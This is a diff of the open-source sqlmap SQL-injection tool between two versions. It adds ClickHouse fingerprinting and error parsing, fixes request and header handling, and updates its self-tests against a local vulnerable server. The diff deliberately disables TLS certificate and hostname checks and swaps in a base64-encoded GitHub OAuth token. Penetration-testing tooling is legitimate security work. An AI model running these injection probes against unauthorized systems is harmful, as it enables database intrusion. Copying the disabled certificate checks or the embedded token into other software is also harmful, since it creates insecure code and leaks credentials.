match = re.search(r"\A([A-Z]+) (.+) HTTP/[\d.]+\Z", line) if not method else None
|
||||
|
||||
if len(line.strip()) == 0 and method and method != HTTPMETHOD.GET and data is None:
|
||||
if len(line.strip()) == 0 and method and (method != HTTPMETHOD.GET or forceBody) and data is None:
|
||||
data = ""
|
||||
params = True
|
||||
|
||||
@@ -5384,16 +5394,18 @@ def parseRequestFile(reqFile, checkParams=True):
|
||||
elif key.upper() == HTTP_HEADER.HOST.upper():
|
||||
if '://' in value:
|
||||
scheme, value = value.split('://')[:2]
|
||||
splitValue = value.split(":")
|
||||
host = splitValue[0]
|
||||
|
||||
if len(splitValue) > 1:
|
||||
port = filterStringValue(splitValue[1], "[0-9]")
|
||||
port = extractRegexResult(r":(?P<result>\d+)\Z", value)
|
||||
if port:
|
||||
value = value[:-(1 + len(port))]
|
||||
|
||||
host = value
|
||||
|
||||
# Avoid to add a static content length header to
|
||||
# headers and consider the following lines as
|
||||
# POSTed data
|
||||
if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper():
|
||||
forceBody = True
|
||||
params = True
|
||||
|
||||
# Avoid proxy and connection type related headers
|
||||
|
||||
@@ -38,6 +38,7 @@ from lib.core.settings import SQLITE_ALIASES
|
||||
from lib.core.settings import SYBASE_ALIASES
|
||||
from lib.core.settings import VERTICA_ALIASES
|
||||
from lib.core.settings import VIRTUOSO_ALIASES
|
||||
from lib.core.settings import CLICKHOUSE_ALIASES
|
||||
|
||||
FIREBIRD_TYPES = {
|
||||
261: "BLOB",
|
||||
@@ -241,6 +242,7 @@ DBMS_DICT = {
|
||||
DBMS.PRESTO: (PRESTO_ALIASES, "presto-python-client", "https://github.com/prestodb/presto-python-client", None),
|
||||
DBMS.ALTIBASE: (ALTIBASE_ALIASES, None, None, None),
|
||||
DBMS.MIMERSQL: (MIMERSQL_ALIASES, "mimerpy", "https://github.com/mimersql/MimerPy", None),
|
||||
DBMS.CLICKHOUSE: (CLICKHOUSE_ALIASES, "clickhouse_connect", "https://github.com/ClickHouse/clickhouse-connect", None),
|
||||
DBMS.CRATEDB: (CRATEDB_ALIASES, "python-psycopg2", "https://github.com/psycopg/psycopg2", "postgresql"),
|
||||
DBMS.CUBRID: (CUBRID_ALIASES, "CUBRID-Python", "https://github.com/CUBRID/cubrid-python", None),
|
||||
DBMS.CACHE: (CACHE_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & https://github.com/jpype-project/jpype", None),
|
||||
@@ -268,7 +270,7 @@ HEURISTIC_NULL_EVAL = {
|
||||
DBMS.ACCESS: "CVAR(NULL)",
|
||||
DBMS.MAXDB: "ALPHA(NULL)",
|
||||
DBMS.MSSQL: "DIFFERENCE(NULL,NULL)",
|
||||
DBMS.MYSQL: "QUARTER(NULL)",
|
||||
DBMS.MYSQL: "QUARTER(NULL XOR NULL)",
|
||||
DBMS.ORACLE: "INSTR2(NULL,NULL)",
|
||||
DBMS.PGSQL: "QUOTE_IDENT(NULL)",
|
||||
DBMS.SQLITE: "UNLIKELY(NULL)",
|
||||
@@ -286,6 +288,7 @@ HEURISTIC_NULL_EVAL = {
|
||||
DBMS.EXTREMEDB: "NULLIFZERO(hashcode(NULL))",
|
||||
DBMS.RAIMA: "IF(ROWNUMBER()>0,CONVERT(NULL,TINYINT),NULL))",
|
||||
DBMS.VIRTUOSO: "__MAX_NOTNULL(NULL)",
|
||||
DBMS.CLICKHOUSE: "halfMD5(NULL) IS NULL",
|
||||
}
|
||||
|
||||
SQL_STATEMENTS = {
|
||||
|
||||
@@ -52,6 +52,7 @@ class DBMS(object):
|
||||
PRESTO = "Presto"
|
||||
ALTIBASE = "Altibase"
|
||||
MIMERSQL = "MimerSQL"
|
||||
CLICKHOUSE = "ClickHouse"
|
||||
CRATEDB = "CrateDB"
|
||||
CUBRID = "Cubrid"
|
||||
CACHE = "InterSystems Cache"
|
||||
@@ -81,6 +82,7 @@ class DBMS_DIRECTORY_NAME(object):
|
||||
PRESTO = "presto"
|
||||
ALTIBASE = "altibase"
|
||||
MIMERSQL = "mimersql"
|
||||
CLICKHOUSE = "clickhouse"
|
||||
CRATEDB = "cratedb"
|
||||
CUBRID = "cubrid"
|
||||
CACHE = "cache"
|
||||
|
||||
@@ -815,7 +815,7 @@ def _setTamperingFunctions():
|
||||
priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__
|
||||
|
||||
for name, function in inspect.getmembers(module, inspect.isfunction):
|
||||
if name == "tamper" and (hasattr(inspect, "signature") and all(_ in inspect.signature(function).parameters for _ in ("payload", "kwargs")) or hasattr(inspect, "getargspec") and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs"):
|
||||
if name == "tamper" and (hasattr(inspect, "signature") and all(_ in inspect.signature(function).parameters for _ in ("payload", "kwargs")) or inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs"):
|
||||
found = True
|
||||
kb.tamperFunctions.append(function)
|
||||
function.__name__ = module.__name__
|
||||
@@ -2145,6 +2145,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
||||
kb.prependFlag = False
|
||||
kb.processResponseCounter = 0
|
||||
kb.previousMethod = None
|
||||
kb.processNonCustom = None
|
||||
kb.processUserMarks = None
|
||||
kb.proxyAuthHeader = None
|
||||
kb.queryCounter = 0
|
||||
|
||||
@@ -6,6 +6,8 @@ See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
import codecs
|
||||
import collections
|
||||
import inspect
|
||||
import os
|
||||
import random
|
||||
import re
|
||||
@@ -93,6 +95,26 @@ def dirtyPatches():
|
||||
else:
|
||||
os.urandom = lambda size: "".join(chr(random.randint(0, 255)) for _ in xrange(size))
|
||||
|
||||
# Reference: https://github.com/bottlepy/bottle/blob/df67999584a0e51ec5b691146c7fa4f3c87f5aac/bottle.py
|
||||
# Reference: https://python.readthedocs.io/en/v2.7.2/library/inspect.html#inspect.getargspec
|
||||
if not hasattr(inspect, "getargspec") and hasattr(inspect, "getfullargspec"):
|
||||
ArgSpec = collections.namedtuple("ArgSpec", ("args", "varargs", "keywords", "defaults"))
|
||||
|
||||
def makelist(data):
|
||||
if isinstance(data, (tuple, list, set, dict)):
|
||||
return list(data)
|
||||
elif data:
|
||||
return [data]
|
||||
else:
|
||||
return []
|
||||
|
||||
def getargspec(func):
|
||||
spec = inspect.getfullargspec(func)
|
||||
kwargs = makelist(spec[0]) + makelist(spec.kwonlyargs)
|
||||
return ArgSpec(kwargs, spec[1], spec[2], spec[3])
|
||||
|
||||
inspect.getargspec = getargspec
|
||||
|
||||
def resolveCrossReferences():
|
||||
"""
|
||||
Place for cross-reference resolution
|
||||
|
||||
@@ -20,7 +20,7 @@ from thirdparty import six
|
||||
from thirdparty.six import unichr as _unichr
|
||||
|
||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||
VERSION = "1.7.2.0"
|
||||
VERSION = "1.7.7.0"
|
||||
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
||||
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
||||
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
||||
@@ -283,6 +283,7 @@ PRESTO_SYSTEM_DBS = ("information_schema",)
|
||||
ALTIBASE_SYSTEM_DBS = ("SYSTEM_",)
|
||||
MIMERSQL_SYSTEM_DBS = ("information_schema", "SYSTEM",)
|
||||
CRATEDB_SYSTEM_DBS = ("information_schema", "pg_catalog", "sys")
|
||||
CLICKHOUSE_SYSTEM_DBS = ("information_schema", "INFORMATION_SCHEMA", "system")
|
||||
CUBRID_SYSTEM_DBS = ("DBA",)
|
||||
CACHE_SYSTEM_DBS = ("%Dictionary", "INFORMATION_SCHEMA", "%SYS")
|
||||
EXTREMEDB_SYSTEM_DBS = ("",)
|
||||
@@ -313,6 +314,7 @@ ALTIBASE_ALIASES = ("altibase",)
|
||||
MIMERSQL_ALIASES = ("mimersql", "mimer")
|
||||
CRATEDB_ALIASES = ("cratedb", "crate")
|
||||
CUBRID_ALIASES = ("cubrid",)
|
||||
CLICKHOUSE_ALIASES = ("clickhouse",)
|
||||
CACHE_ALIASES = ("intersystems cache", "cachedb", "cache", "iris")
|
||||
EXTREMEDB_ALIASES = ("extremedb", "extreme")
|
||||
FRONTBASE_ALIASES = ("frontbase",)
|
||||
@@ -321,10 +323,10 @@ VIRTUOSO_ALIASES = ("virtuoso", "openlink virtuoso")
|
||||
|
||||
DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_"))
|
||||
|
||||
SUPPORTED_DBMS = set(MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES + MONETDB_ALIASES + DERBY_ALIASES + VERTICA_ALIASES + MCKOI_ALIASES + PRESTO_ALIASES + ALTIBASE_ALIASES + MIMERSQL_ALIASES + CRATEDB_ALIASES + CUBRID_ALIASES + CACHE_ALIASES + EXTREMEDB_ALIASES + RAIMA_ALIASES + VIRTUOSO_ALIASES)
|
||||
SUPPORTED_DBMS = set(MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES + MONETDB_ALIASES + DERBY_ALIASES + VERTICA_ALIASES + MCKOI_ALIASES + PRESTO_ALIASES + ALTIBASE_ALIASES + MIMERSQL_ALIASES + CLICKHOUSE_ALIASES + CRATEDB_ALIASES + CUBRID_ALIASES + CACHE_ALIASES + EXTREMEDB_ALIASES + RAIMA_ALIASES + VIRTUOSO_ALIASES)
|
||||
SUPPORTED_OS = ("linux", "windows")
|
||||
|
||||
DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES), (DBMS.MONETDB, MONETDB_ALIASES), (DBMS.DERBY, DERBY_ALIASES), (DBMS.VERTICA, VERTICA_ALIASES), (DBMS.MCKOI, MCKOI_ALIASES), (DBMS.PRESTO, PRESTO_ALIASES), (DBMS.ALTIBASE, ALTIBASE_ALIASES), (DBMS.MIMERSQL, MIMERSQL_ALIASES), (DBMS.CRATEDB, CRATEDB_ALIASES), (DBMS.CUBRID, CUBRID_ALIASES), (DBMS.CACHE, CACHE_ALIASES), (DBMS.EXTREMEDB, EXTREMEDB_ALIASES), (DBMS.FRONTBASE, FRONTBASE_ALIASES), (DBMS.RAIMA, RAIMA_ALIASES), (DBMS.VIRTUOSO, VIRTUOSO_ALIASES))
|
||||
DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES), (DBMS.MONETDB, MONETDB_ALIASES), (DBMS.DERBY, DERBY_ALIASES), (DBMS.VERTICA, VERTICA_ALIASES), (DBMS.MCKOI, MCKOI_ALIASES), (DBMS.PRESTO, PRESTO_ALIASES), (DBMS.ALTIBASE, ALTIBASE_ALIASES), (DBMS.MIMERSQL, MIMERSQL_ALIASES), (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES), (DBMS.CRATEDB, CRATEDB_ALIASES), (DBMS.CUBRID, CUBRID_ALIASES), (DBMS.CACHE, CACHE_ALIASES), (DBMS.EXTREMEDB, EXTREMEDB_ALIASES), (DBMS.FRONTBASE, FRONTBASE_ALIASES), (DBMS.RAIMA, RAIMA_ALIASES), (DBMS.VIRTUOSO, VIRTUOSO_ALIASES))
|
||||
|
||||
USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
|
||||
REFERER_ALIASES = ("ref", "referer", "referrer")
|
||||
@@ -413,6 +415,7 @@ ERROR_PARSING_REGEXES = (
|
||||
r"(?P<result>[^\n>]{0,100}SQL Syntax[^\n<]+)",
|
||||
r"(?s)<li>Error Type:<br>(?P<result>.+?)</li>",
|
||||
r"CDbCommand (?P<result>[^<>\n]*SQL[^<>\n]+)",
|
||||
r"Code: \d+. DB::Exception: (?P<result>[^<>\n]*)",
|
||||
r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P<result>[^<>]+)",
|
||||
r"\[[^\n\]]{1,100}(ODBC|JDBC)[^\n\]]+\](\[[^\]]+\])?(?P<result>[^\n]+(in query expression|\(SQL| at /[^ ]+pdo)[^\n<]+)",
|
||||
r"(?P<result>query error: SELECT[^<>]+)"
|
||||
@@ -428,7 +431,7 @@ META_REFRESH_REGEX = r'(?i)<meta http-equiv="?refresh"?[^>]+content="?[^">]+;\s*
|
||||
JAVASCRIPT_HREF_REGEX = r'<script>\s*(\w+\.)?location\.href\s*=["\'](?P<result>[^"\']+)'
|
||||
|
||||
# Regular expression used for parsing empty fields in tested form data
|
||||
EMPTY_FORM_FIELDS_REGEX = r'(&|\A)(?P<result>[^=]+=(&|\Z))'
|
||||
EMPTY_FORM_FIELDS_REGEX = r'(&|\A)(?P<result>[^=]+=)(?=&|\Z)'
|
||||
|
||||
# Reference: http://www.cs.ru.nl/bachelorscripties/2010/Martin_Devillers___0437999___Analyzing_password_strength.pdf
|
||||
COMMON_PASSWORD_SUFFIXES = ("1", "123", "2", "12", "3", "13", "7", "11", "5", "22", "23", "01", "4", "07", "21", "14", "10", "06", "08", "8", "15", "69", "16", "6", "18")
|
||||
@@ -699,7 +702,7 @@ DEFAULT_COOKIE_DELIMITER = ';'
|
||||
FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
|
||||
|
||||
# Github OAuth token used for creating an automatic Issue for unhandled exceptions
|
||||
GITHUB_REPORT_OAUTH_TOKEN = "Z2hwX2FOMDdpUWx0NDg0ak85QW4yU1pSQjhtazhBaVVlRzNaMUxmMA"
|
||||
GITHUB_REPORT_OAUTH_TOKEN = "Z2hwXzJEdUdKQXVyNms3c2J2em0weXNFYlVrZ2hxczE1eDBRQnA2Vg"
|
||||
|
||||
# Skip unforced HashDB flush requests below the threshold number of cached items
|
||||
HASHDB_FLUSH_THRESHOLD = 32
|
||||
|
||||
@@ -156,7 +156,8 @@ def _setRequestParams():
|
||||
if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
|
||||
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
|
||||
conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
|
||||
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*".+?)"(?<!\\")', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data)
|
||||
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*".*?)"(?<!\\")', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data)
|
||||
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*")"', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data)
|
||||
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*)\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data)
|
||||
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)((true|false|null))\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data)
|
||||
for match in re.finditer(r'(?P<name>[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data):
|
||||
|
||||
@@ -48,8 +48,8 @@ def vulnTest():
|
||||
("--dummy", ("all tested parameters do not appear to be injectable", "does not seem to be injectable", "there is not at least one", "~might be injectable")),
|
||||
("-u \"<url>&id2=1\" -p id2 -v 5 --flush-session --level=5 --text-only --test-filter=\"AND boolean-based blind - WHERE or HAVING clause (MySQL comment)\"", ("~1AND",)),
|
||||
("--list-tampers", ("between", "MySQL", "xforwardedfor")),
|
||||
("-r <request> --flush-session -v 5 --test-skip=\"heavy\" --save=<config>", ("CloudFlare", "web application technology: Express", "possible DBMS: 'SQLite'", "User-agent: foobar", "~Type: time-based blind", "saved command line options to the configuration file")),
|
||||
("-c <config>", ("CloudFlare", "possible DBMS: 'SQLite'", "User-agent: foobar", "~Type: time-based blind")),
|
||||
("-r <request> --flush-session -v 5 --test-skip=\"heavy\" --save=<config>", ("CloudFlare", "web application technology: Express", "possible DBMS: 'SQLite'", "User-Agent: foobar", "~Type: time-based blind", "saved command line options to the configuration file")),
|
||||
("-c <config>", ("CloudFlare", "possible DBMS: 'SQLite'", "User-Agent: foobar", "~Type: time-based blind")),
|
||||
("-l <log> --flush-session --keep-alive --skip-waf -vvvvv --technique=U --union-from=users --banner --parse-errors", ("banner: '3.", "ORDER BY term out of range", "~xp_cmdshell", "Connection: keep-alive")),
|
||||
("-l <log> --offline --banner -v 5", ("banner: '3.", "~[TRAFFIC OUT]")),
|
||||
("-u <base> --flush-session --data=\"id=1&_=Eewef6oh\" --chunked --randomize=_ --random-agent --banner", ("fetched random HTTP User-Agent header value", "Parameter: id (POST)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "banner: '3.")),
|
||||
@@ -147,7 +147,7 @@ def vulnTest():
|
||||
handle, multiple = tempfile.mkstemp(suffix=".lst")
|
||||
os.close(handle)
|
||||
|
||||
content = "POST / HTTP/1.0\nUser-agent: foobar\nHost: %s:%s\n\nid=1\n" % (address, port)
|
||||
content = "POST / HTTP/1.0\nUser-Agent: foobar\nHost: %s:%s\n\nid=1\n" % (address, port)
|
||||
with open(request, "w+") as f:
|
||||
f.write(content)
|
||||
f.flush()
|
||||
|
||||
@@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission
|
||||
from __future__ import print_function
|
||||
|
||||
import difflib
|
||||
import sqlite3
|
||||
import threading
|
||||
import time
|
||||
import traceback
|
||||
@@ -227,16 +228,19 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
|
||||
if conf.get("verbose") > 1 and isinstance(ex, SqlmapValueException):
|
||||
traceback.print_exc()
|
||||
|
||||
except:
|
||||
except Exception as ex:
|
||||
print()
|
||||
|
||||
if not kb.multipleCtrlC:
|
||||
from lib.core.common import unhandledExceptionMessage
|
||||
if isinstance(ex, sqlite3.Error):
|
||||
raise
|
||||
else:
|
||||
from lib.core.common import unhandledExceptionMessage
|
||||
|
||||
kb.threadException = True
|
||||
errMsg = unhandledExceptionMessage()
|
||||
logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg))
|
||||
traceback.print_exc()
|
||||
kb.threadException = True
|
||||
errMsg = unhandledExceptionMessage()
|
||||
logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg))
|
||||
traceback.print_exc()
|
||||
|
||||
finally:
|
||||
kb.multiThreadMode = False
|
||||
|
||||
@@ -71,7 +71,7 @@ def update():
|
||||
logger.warning(warnMsg)
|
||||
|
||||
if VERSION == getLatestRevision():
|
||||
logger.info("already at the latest revision '%s'" % getRevisionNumber())
|
||||
logger.info("already at the latest revision '%s'" % (getRevisionNumber() or VERSION))
|
||||
return
|
||||
|
||||
message = "do you want to try to fetch the latest 'zipball' from repository and extract it (experimental) ? [y/N]"
|
||||
|
||||
@@ -1001,6 +1001,9 @@ def cmdLineParser(argv=None):
|
||||
argv[i] = argv[i].replace("--auth-creds", "--auth-cred", 1)
|
||||
elif argv[i].startswith("--drop-cookie"):
|
||||
argv[i] = argv[i].replace("--drop-cookie", "--drop-set-cookie", 1)
|
||||
elif re.search(r"\A--tamper[^=\s]", argv[i]):
|
||||
argv[i] = ""
|
||||
continue
|
||||
elif re.search(r"\A(--(tamper|ignore-code|skip))(?!-)", argv[i]):
|
||||
key = re.search(r"\-?\-(\w+)\b", argv[i]).group(1)
|
||||
index = auxIndexes.get(key, None)
|
||||
|
||||
@@ -441,7 +441,7 @@ class Connect(object):
|
||||
requestMsg += " %s" % _http_client.HTTPConnection._http_vsn_str
|
||||
|
||||
# Prepare HTTP headers
|
||||
headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host}, base=None if target else {})
|
||||
headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: getHeader(dict(conf.httpHeaders), HTTP_HEADER.HOST) or getHostHeader(url)}, base=None if target else {})
|
||||
|
||||
if HTTP_HEADER.COOKIE in headers:
|
||||
cookie = headers[HTTP_HEADER.COOKIE]
|
||||
@@ -453,9 +453,6 @@ class Connect(object):
|
||||
headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader
|
||||
|
||||
if not conf.requestFile or not target:
|
||||
if not getHeader(headers, HTTP_HEADER.HOST):
|
||||
headers[HTTP_HEADER.HOST] = getHostHeader(url)
|
||||
|
||||
if not getHeader(headers, HTTP_HEADER.ACCEPT):
|
||||
headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE
|
||||
|
||||
@@ -544,7 +541,7 @@ class Connect(object):
|
||||
responseHeaders = _(ws.getheaders())
|
||||
responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()]
|
||||
|
||||
requestHeaders += "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if hasattr(key, "capitalize") else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
|
||||
requestHeaders += "\r\n".join(["%s: %s" % (u"-".join(_.capitalize() for _ in getUnicode(key).split(u'-')) if hasattr(key, "capitalize") else getUnicode(key), getUnicode(value)) for (key, value) in responseHeaders.items()])
|
||||
requestMsg += "\r\n%s" % requestHeaders
|
||||
|
||||
if post is not None:
|
||||
@@ -583,7 +580,7 @@ class Connect(object):
|
||||
else:
|
||||
post, headers = req.data, req.headers
|
||||
|
||||
requestHeaders += "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if hasattr(key, "capitalize") else key), getUnicode(value)) for (key, value) in req.header_items()])
|
||||
requestHeaders += "\r\n".join(["%s: %s" % (u"-".join(_.capitalize() for _ in getUnicode(key).split(u'-')) if hasattr(key, "capitalize") else getUnicode(key), getUnicode(value)) for (key, value) in req.header_items()])
|
||||
|
||||
if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj:
|
||||
conf.cj._policy._now = conf.cj._now = int(time.time())
|
||||
@@ -752,7 +749,7 @@ class Connect(object):
|
||||
|
||||
responseMsg += "[#%d] (%s %s):\r\n" % (threadData.lastRequestUID, code, status)
|
||||
|
||||
if responseHeaders:
|
||||
if responseHeaders and getattr(responseHeaders, "headers", None):
|
||||
logHeaders = "".join(getUnicode(responseHeaders.headers)).strip()
|
||||
|
||||
logHTTPTraffic(requestMsg, "%s%s\r\n\r\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_READ_SIZE]), start, time.time())
|
||||
@@ -814,7 +811,7 @@ class Connect(object):
|
||||
debugMsg = "got HTTP error code: %d ('%s')" % (code, status)
|
||||
logger.debug(debugMsg)
|
||||
|
||||
except (_urllib.error.URLError, socket.error, socket.timeout, _http_client.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError, ValueError, OverflowError, AttributeError, OSError):
|
||||
except (_urllib.error.URLError, socket.error, socket.timeout, _http_client.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError, ValueError, OverflowError, AttributeError, OSError, AssertionError, KeyError):
|
||||
tbMsg = traceback.format_exc()
|
||||
|
||||
if conf.debug:
|
||||
@@ -822,6 +819,11 @@ class Connect(object):
|
||||
|
||||
if checking:
|
||||
return None, None, None
|
||||
elif "KeyError:" in tbMsg:
|
||||
if "content-length" in tbMsg:
|
||||
return None, None, None
|
||||
else:
|
||||
raise
|
||||
elif "AttributeError:" in tbMsg:
|
||||
if "WSAECONNREFUSED" in tbMsg:
|
||||
return None, None, None
|
||||
@@ -1333,7 +1335,7 @@ class Connect(object):
|
||||
compile(getBytes(re.sub(r"\s*;\s*", "\n", conf.evalCode)), "", "exec")
|
||||
except SyntaxError as ex:
|
||||
if ex.text:
|
||||
original = replacement = ex.text.strip()
|
||||
original = replacement = getUnicode(ex.text.strip())
|
||||
|
||||
if '=' in original:
|
||||
name, value = original.split('=', 1)
|
||||
|
||||
@@ -27,7 +27,7 @@ try:
|
||||
except ImportError:
|
||||
pass
|
||||
|
||||
_protocols = filterNone(getattr(ssl, _, None) for _ in ("PROTOCOL_TLSv1_2", "PROTOCOL_TLSv1_1", "PROTOCOL_TLSv1", "PROTOCOL_SSLv3", "PROTOCOL_SSLv23", "PROTOCOL_SSLv2"))
|
||||
_protocols = filterNone(getattr(ssl, _, None) for _ in ("PROTOCOL_TLS_CLIENT", "PROTOCOL_TLSv1_2", "PROTOCOL_TLSv1_1", "PROTOCOL_TLSv1", "PROTOCOL_SSLv3", "PROTOCOL_SSLv23", "PROTOCOL_SSLv2"))
|
||||
_lut = dict((getattr(ssl, _), _) for _ in dir(ssl) if _.startswith("PROTOCOL_"))
|
||||
_contexts = {}
|
||||
|
||||
@@ -69,6 +69,11 @@ class HTTPSConnection(_http_client.HTTPSConnection):
|
||||
sock = create_sock()
|
||||
if protocol not in _contexts:
|
||||
_contexts[protocol] = ssl.SSLContext(protocol)
|
||||
|
||||
# Disable certificate and hostname validation enabled by default with PROTOCOL_TLS_CLIENT
|
||||
_contexts[protocol].check_hostname = False
|
||||
_contexts[protocol].verify_mode = ssl.CERT_NONE
|
||||
|
||||
if getattr(self, "cert_file", None) and getattr(self, "key_file", None):
|
||||
_contexts[protocol].load_cert_chain(certfile=self.cert_file, keyfile=self.key_file)
|
||||
try:
|
||||
|
||||
@@ -66,7 +66,7 @@ class SmartRedirectHandler(_urllib.request.HTTPRedirectHandler):
|
||||
self.redirect_request = self._redirect_request
|
||||
|
||||
def _redirect_request(self, req, fp, code, msg, headers, newurl):
|
||||
return _urllib.request.Request(newurl.replace(' ', '%20'), data=req.data, headers=req.headers, origin_req_host=req.get_origin_req_host())
|
||||
return _urllib.request.Request(newurl.replace(' ', '%20'), data=req.data, headers=req.headers, origin_req_host=req.get_origin_req_host() if hasattr(req, "get_origin_req_host") else req.origin_req_host)
|
||||
|
||||
def http_error_302(self, req, fp, code, msg, headers):
|
||||
start = time.time()
|
||||
|
||||
@@ -26,6 +26,7 @@ from lib.core.common import goGoodSamaritan
|
||||
from lib.core.common import hashDBRetrieve
|
||||
from lib.core.common import hashDBWrite
|
||||
from lib.core.common import incrementCounter
|
||||
from lib.core.common import isDigit
|
||||
from lib.core.common import isListLike
|
||||
from lib.core.common import safeStringFormat
|
||||
from lib.core.common import singleTimeWarnMessage
|
||||
@@ -61,6 +62,7 @@ from lib.request.connect import Connect as Request
|
||||
from lib.utils.progress import ProgressBar
|
||||
from lib.utils.safe2bin import safecharencode
|
||||
from lib.utils.xrange import xrange
|
||||
from thirdparty import six
|
||||
|
||||
def bisection(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None, dump=False):
|
||||
"""
|
||||
@@ -163,7 +165,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||
else:
|
||||
expressionUnescaped = unescaper.escape(expression)
|
||||
|
||||
if hasattr(length, "isdigit") and length.isdigit() or isinstance(length, int):
|
||||
if isinstance(length, six.string_types) and isDigit(length) or isinstance(length, int):
|
||||
length = int(length)
|
||||
else:
|
||||
length = None
|
||||
|
||||
@@ -7,7 +7,6 @@ See the file 'LICENSE' for copying permission
|
||||
|
||||
from __future__ import division
|
||||
|
||||
import logging
|
||||
import time
|
||||
|
||||
from lib.core.common import Backend
|
||||
@@ -387,9 +386,6 @@ def fileExists(pathFile):
|
||||
kb.locks.io.release()
|
||||
|
||||
try:
|
||||
pushValue(logger.getEffectiveLevel())
|
||||
logger.setLevel(logging.CRITICAL)
|
||||
|
||||
runThreads(conf.threads, fileExistsThread, threadChoice=True)
|
||||
except KeyboardInterrupt:
|
||||
warnMsg = "user aborted during file existence "
|
||||
@@ -397,7 +393,6 @@ def fileExists(pathFile):
|
||||
logger.warning(warnMsg)
|
||||
finally:
|
||||
kb.bruteMode = False
|
||||
logger.setLevel(popValue())
|
||||
|
||||
clearConsoleLine(True)
|
||||
dataToStdout("\n")
|
||||
|
||||
